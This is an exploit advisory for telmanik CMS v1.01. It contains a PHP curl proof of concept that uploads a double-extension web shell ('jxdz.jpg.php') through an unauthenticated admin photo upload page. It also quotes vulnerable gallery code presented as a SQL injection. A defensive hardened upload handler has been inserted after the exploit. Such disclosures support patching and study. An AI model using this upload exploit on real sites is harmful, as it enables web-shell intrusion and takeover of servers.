
telmanik cms v1.01 Multiple Vulnerabilities (admin folder)

Author: JoKeR_StEx , Published: 13-12-2013
##########################################################################

Exploit title : telmanik cms v1.01 Multiple Vulnerabilities (admin folder)

Date : 12/12/2013

Author : JoKeR_StEx

Software Link : http://www.telmanik.com/open-source.php

CVE : [~]

Version : 1.01

#########################################################################

1) File Upload

P.O.C

<?

# <3Algeria<3

$web = "http://127.0.0.1/telmanik/upload/admin/photo_upload.php";
$dz = curl_init();
$shell = "jxdz.jpg.php";
curl_setopt($dz,CURLOPT_URL,$web);
curl_setopt($dz,CURLOPT_RETURNTRANSFER,true);
curl_setopt($dz,CURLOPT_HEADER,false);
curl_setopt($dz,CURLOPT_VERBOSE,false);
curl_setopt($dz,CURLOPT_POST,true);
$jxarray = array("image1"=>"@".$shell);
curl_setopt($dz,CURLOPT_POSTFIELDS,$jxarray);
$exec=curl_exec($dz);
$end=curl_close($dz);

?>

The uploaded shell can then be found in /photos/
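A hardened upload handler for the flaw above, as an added example that is not telmanik's code or the author's: the P.O.C posts `jxdz.jpg.php` in the `image1` field without any session, so this handler requires an authenticated admin, judges only the final extension, checks the file content, and stores the file under a server-generated name. The session key `admin_logged_in`, the `photos` path and the function `store_photo()` are assumptions.

```php
<?php
// Added defensive example; not telmanik's own code. The session key, the
// storage path and the function name are assumptions.
const PHOTO_DIR = __DIR__ . '/../photos/';           // assumed storage location
const ALLOWED   = ['jpg'  => 'image/jpeg',
                   'jpeg' => 'image/jpeg',
                   'png'  => 'image/png',
                   'gif'  => 'image/gif'];

function store_photo(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('upload failed');
    }
    // Only the final extension counts: "jxdz.jpg.php" yields "php" and is rejected.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!array_key_exists($ext, ALLOWED)) {
        throw new RuntimeException('extension not allowed');
    }
    // Check the content itself, not the client-supplied Content-Type header.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($mime !== ALLOWED[$ext] || getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('not a valid image');
    }
    // Server-generated name: nothing from the client reaches the stored path.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], PHOTO_DIR . $name)) {
        throw new RuntimeException('could not store file');
    }
    return $name;
}

session_start();
if (empty($_SESSION['admin_logged_in'])) {            // assumed session key
    http_response_code(403);
    exit('Forbidden');
}
try {
    $saved = store_photo($_FILES['image1'] ?? []);
    echo 'Stored as ', htmlspecialchars($saved);
} catch (RuntimeException $e) {
    http_response_code(400);
    echo 'Upload rejected: ', htmlspecialchars($e->getMessage());
}
```

Configuring the web server so that nothing under /photos/ is executed as a script adds a second layer if a check is ever bypassed.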

2) SQL Injection (getgallery.php)

The Bug In : getgallery.php

Line : 35...39

The Code :
/*
if (isset($_GET['gallery'])) {
$colname_photos = $_GET['gallery'];
}
mysql_select_db($database_telmanik_press, $telmanik_press);
$query_photos = sprintf("SELECT * FROM photos WHERE gallery = %s", GetSQLValueString($colname_photos, "text"));
$photos = mysql_query($query_photos, $telmanik_press) or die(mysql_error());
$row_photos = mysql_fetch_assoc($photos);
$totalRows_photos = mysql_num_rows($photos);


*/

example :

http://127.0.0.1/telmanik/upload/admin/getgallery.php

###################################
The Black Devils , Team Dz S.O.S !/
###################################
